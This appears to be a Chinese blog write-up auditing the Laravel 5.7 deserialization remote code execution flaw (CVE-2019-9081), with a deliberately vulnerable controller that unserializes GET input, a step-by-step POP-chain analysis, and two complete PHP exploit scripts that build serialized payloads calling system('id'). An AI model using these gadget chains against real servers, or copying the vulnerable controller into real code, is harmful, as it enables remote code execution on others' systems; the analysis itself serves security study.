Laravel 5.7 RCE (CVE-2019-9081)
Laravel 代码审计
环境搭建
Laravel 5.7 文档 : https://learnku.com/docs/laravel/5.7/installation/2242
Composer 下载 :
wget https://getcomposer.org/download/1.8.6/composer.phar获取 composer.phar参照 https://www.jianshu.com/p/438a95046403 安装 Composer 和 Laravel
composer create-project laravel/laravel laravel57 "5.7.*"安装 Laravel 5.7 并生成laravel57项目进入项目文件夹,使用
php artisan serve启动 web 服务在
laravel57/routes/web.php文件添加路由Route::get("/","\App\Http\Controllers\DemoController@demo");
在
laravel57/app/Http/Controllers/下添加DemoController控制器namespace App\Http\Controllers; class DemoController
{
public function demo()
{
if(isset($_GET['c'])){
$code = $_GET['c'];
unserialize($code);
return "peri0d";
} }
}
Laravel 项目文件夹结构
- app : 包含了应用的核心代码
- Broadcasting : 包含应用程序的所有广播频道类,默认不存在
- Console : 包含了所有自定义的 Artisan 命令
- Events : 存放了 事件类。可以使用事件来提醒应用其他部分发生了特定的操作,使应用程序更加的灵活和解耦。默认不存在
- Exceptions : 包含了应用的异常处理器,也是应用抛出异常的好地方
- Http : 包含了控制器、中间件和表单请求。几乎所有的进入应用的请求的处理逻辑都被放在这里
- Jobs : 存放了应用中的 队列任务 。 应用的任务可以被推送到队列或者在当前请求的生命周期内同步运行。在当前请求期间同步运行的任务可以看做是一个「命令」,因为它们是 命令模式 的实现。默认不存在
- Listeners : 包含了用来处理 事件 的类。事件监听器接收事件实例并执行响应该事件被触发的逻辑。默认不存在
- Mail : 包含应用所有的邮件发送类。默认不存在
- Notifications : 包含应用发送的所有「业务性」通知,比如关于在应用中发生的事件的简单通知。默认不存在
- Policies : 包含了应用的授权策略类。策略可以用来决定一个用户是否有权限去操作指定资源。默认不存在
- Providers : 包含应用的所有服务提供者。服务提供者通过在服务容器中绑定服务、注册事件、以及执行其他任务来为即将到来的请求做准备来启动应用。
- Rules : 包含应用自定义验证规则对象。这些规则意在将复杂的验证逻辑封装在一个简单的对象中。默认不存在
- bootstrap : 包含启动框架的
app.php,还包含cache目录,其下存放框架生成的用来提升性能的文件,比如路由和服务缓存文件 - config : 包含应用程序所有的配置文件
- database : 包含数据填充和迁移文件以及模型工厂类
- public : 包含入口文件
index.php,它是进入应用程序的所有请求的入口点。还包含一些资源文件,比如图片、JS 和 CSS - resources : 包含了视图和未编译的资源文件(如 LESS、SASS 或 JavaScript )。此目录还包含所有的语言文件
- routes : 包含了应用的所有路由定义
- storage : 包含编译后的 Blade 模板、session 会话生成的文件、缓存文件以及框架生成的其他文件
- tests : 包含自动化测试文件
- vendor : 包含所有的 Composer 依赖包,其中也包含了 Laravel 源码
第一种漏洞分析
漏洞触发点位于
Illuminate/Foundation/Testing/PendingCommand.php中的run方法,该文件的功能就是命令执行并获取输出,PendingCommand.php又定义了__destruct()方法,思路就是构造 payload 触发__destruct()方法进而调用run方法实现 rce根据已有的 exp 来看,
PendingCommand类的属性如下$this->app; // 一个实例化的类 Illuminate\Foundation\Application
$this->test; // 一个实例化的类 Illuminate\Auth\GenericUser
$this->command; // 要执行的php函数 system
$this->parameters; // 要执行的php函数的参数 array('id')
在
unserialize($code)处下断点调试,观察调用栈,发现有几个加载函数,spl_autoload_call()、Illuminate\Foundation\AliasLoader->load()、Composer\Autoload\ClassLoader->loadClass()、Composer\Autoload\includeFile()。在加载完所需要的类后,会进入
PendingCommand类的__destruct()方法。由于hasExecuted默认是false,所以会去执行run()函数,run()函数会在第 8 行执行命令,其代码如下public function run()
{
$this->hasExecuted = true; $this->mockConsoleOutput(); try {
$exitCode = $this->app[Kernel::class]->call($this->command, $this->parameters);
} catch (NoMatchingExpectationException $e) {
if ($e->getMethodName() === 'askQuestion') {
$this->test->fail('Unexpected question "'.$e->getActualArguments()[0]->getQuestion().'" was asked.');
}
throw $e;
}
run()中首先执行了mockConsoleOutput(),该函数主要功能就是模拟控制台输出,此时又会加载一些所需要的类。代码如下protected function mockConsoleOutput()
{
$mock = Mockery::mock(OutputStyle::class.'[askQuestion]', [(new ArrayInput($this->parameters)), $this->createABufferedOutputMock(),]);
foreach ($this->test->expectedQuestions as $i => $question) {
$mock->shouldReceive('askQuestion')
->once()
->ordered()
->with(Mockery::on(function ($argument) use ($question) {
return $argument->getQuestion() == $question[0];
}))
->andReturnUsing(function () use ($question, $i) {
unset($this->test->expectedQuestions[$i]);
return $question[1];
});
}
$this->app->bind(OutputStyle::class, function () use ($mock) {
return $mock;
});
}
mockConsoleOutput()中又调用了createABufferedOutputMock()。在createABufferedOutputMock()函数中,首先调用mock()函数,它的作用主要是进行对象模拟。然后进入循环,要遍历$this->test类的expectedOutput属性,但是在可以实例化的类中不存在这个属性。当访问一个类中不存在的属性时会触发__get(),通过去触发__get()方法去进一步构造 pop 链。private function createABufferedOutputMock()
{
$mock = Mockery::mock(BufferedOutput::class.'[doWrite]')
->shouldAllowMockingProtectedMethods()
->shouldIgnoreMissing();
foreach ($this->test->expectedOutput as $i => $output) {
$mock->shouldReceive('doWrite')
->once()
->ordered()
->with($output, Mockery::any())
->andReturnUsing(function () use ($i) {
unset($this->test->expectedOutput[$i]);
});
}
return $mock;
}
这里选择
Illuminate\Auth\GenericUser,其__get()魔术方法如下public function __get($key)
{
return $this->attributes[$key];
}
此时
$this->test是我们传入的Illuminate\Auth\GenericUser的实例化对象,则$this->attributes[$key]通过反序列化是可控的,因此我们可以构造$this->attributes键名为expectedOutput的数组。这样一来$this->test->expectedOutput就会返回$this->attributes中键名为expectedOutput的数组回到
mockConsoleOutput()中,又进行了一次 for 循环,调用了$this->test->expectedQuestions,循环体与createABufferedOutputMock()大致相同,所以可以构造$this->attributes键名为expectedQuestions的数组绕过然后就可以走出
mockConsoleOutput()方法,进入命令执行的关键点$exitCode = $this->app[Kernel::class]->call($this->command, $this->parameters);,这里Kernel::class是个固定值,为Illuminate\Contracts\Console\Kernel,这里需要搞清楚$this->app[Kernel::class],可以得到如下的函数调用顺序Container.php:1222, Illuminate\Foundation\Application->offsetGet()
// key = Illuminate\Contracts\Console\Kernel
public function offsetGet($key)
{
return $this->make($key);
}
Application.php:751, Illuminate\Foundation\Application->make()
// abstract = Illuminate\Contracts\Console\Kernel
public function make($abstract, array $parameters = [])
{
$abstract = $this->getAlias($abstract);
if (isset($this->deferredServices[$abstract]) && ! isset($this->instances[$abstract])) {
$this->loadDeferredProvider($abstract);
}
return parent::make($abstract, $parameters);
}
Container.php:609, Illuminate\Foundation\Application->make()
// abstract = Illuminate\Contracts\Console\Kernel
public function make($abstract, array $parameters = [])
{
return $this->resolve($abstract, $parameters);
}
Container.php:652, Illuminate\Foundation\Application->resolve()
// abstract = Illuminate\Contracts\Console\Kernel
protected function resolve($abstract, $parameters = [])
{
$abstract = $this->getAlias($abstract);
$needsContextualBuild = ! empty($parameters) || ! is_null($this->getContextualConcrete($abstract));
if (isset($this->instances[$abstract]) && ! $needsContextualBuild) {
return $this->instances[$abstract];
}
$this->with[] = $parameters;
$concrete = $this->getConcrete($abstract);
// concrete = Illuminate\Foundation\Application
if ($this->isBuildable($concrete, $abstract)) {
$object = $this->build($concrete);
} else {
$object = $this->make($concrete);
}
foreach ($this->getExtenders($abstract) as $extender) {
$object = $extender($object, $this);
}
if ($this->isShared($abstract) && ! $needsContextualBuild) {
$this->instances[$abstract] = $object;
}
$this->fireResolvingCallbacks($abstract, $object);
$this->resolved[$abstract] = true;
array_pop($this->with);
return $object;
}
Container.php:697, Illuminate\Foundation\Application->getConcrete()
// abstract = Illuminate\Contracts\Console\Kernel
protected function getConcrete($abstract)
{
if (! is_null($concrete = $this->getContextualConcrete($abstract))) {
return $concrete;
}
if (isset($this->bindings[$abstract])) {
return $this->bindings[$abstract]['concrete'];
}
return $abstract;
}
在
getConcrete()方法中出了问题,导致可以利用 php 的反射机制实例化任意类。在getConcrete()方法中,判断$this->bindings[$abstract])是否存在,若存在则返回$this->bindings[$abstract]['concrete']。bindings是Container.php中Container类的属性,因此我们只需要找到一个继承自Container的类,就可以通过反序列化控制$this->bindings属性。Illuminate\Foundation\Application继承自Container类。$abstract为Illuminate\Contracts\Console\Kernel,只需通过反序列化定义Illuminate\Foundation\Application的$bindings属性存在键名为Illuminate\Contracts\Console\Kernel的二维数组就能进入该分支语句,返回我们要实例化的类名。在这里返回的是Illuminate\Foundation\Application类。在实例化
Application类的时候, 要满足isBuildable()才可以进行buildprotected function isBuildable($concrete, $abstract)
{
return $concrete === $abstract || $concrete instanceof Closure;
}
此时明显不满足条件,所以接着执行
$object = $this->make($concrete);,在make()函数中成功将$abstract重新赋值为Illuminate\Foundation\Application,从而成功绕过isBuildable()函数,进入$this->build方法,就能看到使用ReflectionClass反射机制,实例化我们传入的类。在返回一个
Illuminate\Foundation\Application对象之后,exitCode = $this->app[Kernel::class]->call($this->command, $this->parameters);又调用了call()方法,由于Illuminate\Foundation\Application没有call()方法,所以会调用父类Illuminate\Container\Container的call()方法。public function call($callback, array $parameters = [], $defaultMethod = null)
{
return BoundMethod::call($this, $callback, $parameters, $defaultMethod);
}
跟进
BoundMethod::call()public static function call($container, $callback, array $parameters = [], $defaultMethod = null)
{
if (static::isCallableWithAtSign($callback) || $defaultMethod) {
return static::callClass($container, $callback, $parameters, $defaultMethod);
}
return static::callBoundMethod($container, $callback, function () use ($container, $callback, $parameters) {
return call_user_func_array(
$callback, static::getMethodDependencies($container, $callback, $parameters)
);
});
}
在
isCallableWithAtSign()处判断回调函数是否为字符串并且其中含有@,并且$defaultMethod默认为 null,很明显不满足条件,进入callBoundMethod(),该函数只是判断$callback是否为数组。后面的匿名函数直接调用call_user_func_array(),并且第一个参数我们可控,参数值为system,第二个参数由getMethodDependencies()方法返回。跟进getMethodDependencies()protected static function getMethodDependencies($container, $callback, array $parameters = [])
{
$dependencies = [];
foreach (static::getCallReflector($callback)->getParameters() as $parameter) {
static::addDependencyForCallParameter($container, $parameter, $parameters, $dependencies);
}
return array_merge($dependencies, $parameters);
}
getCallReflector()用于反射获取$callback的对象, 然后执行addDependencyForCallParameter()为$callback的对象添加一些参数,最后将我们传入的$parameters数组和$dependencies数组合并,$dependencies数组为空。最后相当于执行了call_user_func_array('system',array('id'))exp
<?php
// gadgets.php
namespace Illuminate\Foundation\Testing{
class PendingCommand{
protected $command;
protected $parameters;
protected $app;
public $test; public function __construct($command, $parameters,$class,$app)
{
$this->command = $command;
$this->parameters = $parameters;
$this->test=$class;
$this->app=$app;
}
}
} namespace Illuminate\Auth{
class GenericUser{
protected $attributes;
public function __construct(array $attributes){
$this->attributes = $attributes;
}
}
} namespace Illuminate\Foundation{
class Application{
protected $hasBeenBootstrapped = false;
protected $bindings; public function __construct($bind){
$this->bindings=$bind;
}
}
}
?>
<?php
// chain.php
$genericuser = new Illuminate\Auth\GenericUser(
array(
"expectedOutput"=>array("0"=>"1"),
"expectedQuestions"=>array("0"=>"1")
)
);
$application = new Illuminate\Foundation\Application(
array(
"Illuminate\Contracts\Console\Kernel"=>
array(
"concrete"=>"Illuminate\Foundation\Application"
)
)
);
$exp = new Illuminate\Foundation\Testing\PendingCommand(
"system",array('id'),
$genericuser,
$application
); echo urlencode(serialize($exp));
?>
调用栈分析 :
Illuminate\Foundation\Testing\PendingCommand->__destruct()
$test = Illuminate\Auth\GenericUser
attributes = array(
"expectedOutput"=>array("0"=>"1"),
"expectedQuestions"=>array("0"=>"1")
)
$app = Illuminate\Foundation\Application
array(
"Illuminate\Contracts\Console\Kernel" =>
array(
array("concrete"=>"Illuminate\Foundation\Application")
)
)
$command = "system"
$parameters = array("id") Illuminate\Foundation\Testing\PendingCommand->run()
Illuminate\Foundation\Testing\PendingCommand->mockConsoleOutput()
Illuminate\Foundation\Testing\PendingCommand->createABufferedOutputMock()
// 在 foreach 中访问 expectedOutput 属性,但是 GenericUser 类没有这个属性,故而调用 __get() 方法
Illuminate\Auth\GenericUser->__get()
// return attributes["expectedOutput"]
// return array("0"=>"1")
// 在 foreach 中访问 expectedQuestions 属性,但是 GenericUser 类没有这个属性,故而调用 __get() 方法
Illuminate\Auth\GenericUser->__get()
// return attributes["expectedQuestions"]
// return array("0"=>"1") // Application 继承了 Container 所以这相当于执行父类的 offsetGet()
Illuminate\Foundation\Application->offsetGet()
// key : Illuminate\Contracts\Console\Kernel
Illuminate\Foundation\Application->make()
// abstract : Illuminate\Contracts\Console\Kernel
Illuminate\Foundation\Application->make()
// abstract : Illuminate\Contracts\Console\Kernel
Illuminate\Foundation\Application->resolve()
// abstract : Illuminate\Contracts\Console\Kernel
Illuminate\Foundation\Application->getConcrete()
// $this->bindings[$abstract]['concrete'] : Illuminate\Foundation\Application Illuminate\Foundation\Application->call()
Illuminate\Container\BoundMethod->call()
Illuminate\Container\BoundMethod->getMethodDependencies()
第二种漏洞分析
同样的,在
PendingCommand类的mockConsoleOutput()函数处,去触发__get()方法构造 pop 链,这里选择Faker\DefaultGenerator类,其__get()方法如下 :public function __construct($default = null)
{
$this->default = $default;
}
同样的方法绕过
mockConsoleOutput()函数,运行到$exitCode = $this->app[Kernel::class]->call($this->command, $this->parameters);处。只不过这次的关注点在于resolve()函数的$this->instances[$abstract]处// abstract = Illuminate\Contracts\Console\Kernel
protected function resolve($abstract, $parameters = [])
{
$abstract = $this->getAlias($abstract);
$needsContextualBuild = ! empty($parameters) || ! is_null($this->getContextualConcrete($abstract));
if (isset($this->instances[$abstract]) && ! $needsContextualBuild) {
// 在这里返回一个可控的实例化对象
return $this->instances[$abstract];
}
$this->with[] = $parameters;
$concrete = $this->getConcrete($abstract);
if ($this->isBuildable($concrete, $abstract)) {
$object = $this->build($concrete);
} else {
$object = $this->make($concrete);
}
foreach ($this->getExtenders($abstract) as $extender) {
$object = $extender($object, $this);
}
if ($this->isShared($abstract) && ! $needsContextualBuild) {
$this->instances[$abstract] = $object;
}
$this->fireResolvingCallbacks($abstract, $object);
$this->resolved[$abstract] = true;
array_pop($this->with);
return $object;
}
instances是Container.php中Container类的属性。因此我们只需要找到一个继承自Container的类,就可以通过反序列化控制$this->instances属性。Illuminate\Foundation\Application继承自Container类。$abstract为Illuminate\Contracts\Console\Kernel,只需通过反序列化定义Illuminate\Foundation\Application的$instances属性存在键名为Illuminate\Contracts\Console\Kernel的数组就能返回我们要实例化的类名。在这里返回的是Illuminate\Foundation\Application类。其余的就和第一种相同了,不同点在于构造可控实例化对象的方法不同
exp :
<?php
// gadgets.php
namespace Illuminate\Foundation\Testing{
class PendingCommand{
protected $command;
protected $parameters;
protected $app;
public $test; public function __construct($command, $parameters,$class,$app)
{
$this->command = $command;
$this->parameters = $parameters;
$this->test=$class;
$this->app=$app;
}
}
} namespace Faker{
class DefaultGenerator{
protected $default; public function __construct($default = null)
{
$this->default = $default;
}
}
} namespace Illuminate\Foundation{
class Application{
protected $instances = [];
public function __construct($instance){
$this->instances["Illuminate\Contracts\Console\Kernel"] = $instance;
}
}
}
?>
<?php
// chain.php
$defaultgenerator = new Faker\DefaultGenerator(array("expectedOutput"=>array("0"=>"1"),"expectedQuestions"=>array("0"=>"1")));
$app = new Illuminate\Foundation\Application();
$application = new Illuminate\Foundation\Application($app);
$pendingcommand = new Illuminate\Foundation\Testing\PendingCommand('system', array('id'), $defaultgenerator, $application); echo urlencode(serialize($pendingcommand));
?>
思考
- 代码调试的技巧
- 函数调用栈的分析
- 可控点的寻找
参考链接
- https://xz.aliyun.com/t/5483
- https://laworigin.github.io/2019/02/21/laravelv5-7反序列化rce/
- https://www.jianshu.com/p/438a95046403
Laravel 5.7 RCE (CVE-2019-9081)的更多相关文章
- Laravel 5.8 RCE 分析
原帖地址 : https://xz.aliyun.com/t/6059 Laravel 代码审计 环境搭建 composer create-project --prefer-dist laravel/ ...
- CVE 2019 0708 安装重启之后 可能造成 手动IP地址丢失.
1. 最近两天发现 更新了微软的CVE 2019-0708的补丁之后 之前设置的手动ip地址会变成 自动获取, 造成ip地址丢失.. 我昨天遇到两个, 今天同事又遇到一个.微软做补丁也不走心啊..
- CVE-2019-9081:laravel框架序列化RCE复现分析
这里贴上两篇大佬的分析的帖子 本人习惯把平常的一些笔记或者好的帖子记录在自己的博客当中,便于之后遇到同样的漏洞时快速打开思路 1.https://xz.aliyun.com/t/5510#toc-8 ...
- CVE-2021-3129:Laravel远程代码漏洞复现分析
摘要:本文主要为大家带来CVE-2021-3129漏洞复现分析,为大家在日常工作中提供帮助. 本文分享自华为云社区<CVE-2021-3129 分析>,作者:Xuuuu . CVE-202 ...
- Debian Security Advisory(Debian安全报告) DSA-4414-1 libapache2-mod-auth-mellon security update
Debian Security Advisory(Debian安全报告) DSA-4414-1 libapache2-mod-auth-mellon security update Package:l ...
- 2021 羊城杯WriteUP
比赛感受 题目质量挺不错的,不知道题目会不会上buu有机会复现一下,躺了个三等奖,发下队伍的wp Team BinX from GZHU web Checkin_Go 源码下载下来发现是go语言写的 ...
- [BUUOJ记录] [极客大挑战 2019]RCE ME
前面考察取反或者异或绕过,后面读Flag那里我用脏方法过了,没看出来考察啥 进入题目给出源码: <?php error_reporting(0); if(isset($_GET['code']) ...
- [原题复现]ByteCTF 2019 –WEB- Boring-Code[无参数rce、绕过filter_var(),等]
简介 原题复现: 考察知识点:无参数命令执行.绕过filter_var(), preg_match() 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使 ...
- [原题复现]2019上海大学生WEB-Decade(无参数RCE、Fuzz)
简介 原题复现: 考察知识点:无参数命令执行.Fuzz 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 环境复现 ...
随机推荐
- [JVM教程与调优] 了解JVM 堆内存溢出以及非堆内存溢出
在上一章中我们介绍了JVM运行时参数以及jstat指令相关内容:[JVM教程与调优] 什么是JVM运行时参数?.下面我们来介绍一下jmap+MAT内存溢出. 首先我们来介绍一下下JVM的内存结构. J ...
- 【转】Standardization(标准化)和Normalization(归一化)的区别
Standardization(标准化)和Normalization(归一化)的区别 https://blog.csdn.net/Dhuang159/article/details/83627146 ...
- OpenCV-Python 改变颜色空间 | 十三
目标 在本教程中,你将学习如何将图像从一个色彩空间转换到另一个,像BGR↔灰色,BGR↔HSV等 除此之外,我们还将创建一个应用程序,以提取视频中的彩色对象 你将学习以下功能:cv.cvtColor, ...
- 3分钟了解GPT Bert与XLNet的差异
译者 | Arno 来源 | Medium XLNet是一种新的预训练模型,在20项任务中表现优于BERT,且有大幅度的提升. 这是什么原因呢? 在不了解机器学习的情况下,不难估计我们捕获的上下文越多 ...
- coding++:mybatis 嵌套查询子查询column传多个参数描述
mybatis 嵌套查询子查询column传多个参数如下: 2.代码示例 备注:注意,相同颜色的单词都是有关联的 <resultMap id="blogResult" typ ...
- SpringCloud服务的注册发现--------Eureka
1,什么叫做服务的注册与发现 服务的注册与发现基于注册中心,注册中心本身是一个服务,也相当于一个载体,其他服务的注册需要注册到这个注册中心上. 注册:当服务器启动的时候,会将自己的服务器信息,通过别名 ...
- nginx代理图片上传以及访问
nginx代理图片上传 首先需要利用nginx代理图片访问参考 https://www.cnblogs.com/TJ21/p/12609017.html 编写接受文件的controller @Post ...
- CDN加速小水管动态应用技巧
不得不说现在大陆和HK的云主机都是小水管模式,由于硬件的快速发展在这种小水管的情况下很难发挥出用户硬件资源的能力,当然可以加水管但费用很高,更多时候会浪费带宽:这个时候我们想到CDN加速,这种资源的好 ...
- Java 为 Excel 中的行设置交替背景色
在制作Excel表格时,通过将数据表中上下相邻的两行用不同的背景色填充,可以使各行的数据看起来更清楚,避免看错行,同时也能增加Excel表格的美观度.本文将介绍如何在Java程序中为 Excel 奇数 ...
- vue引入echart Error in mounted hook: "ReferenceError: myChart is not defined" found in
解决办法: // 实例化echarts对象 var/let myChart = echarts.init(this.$refs.myChart)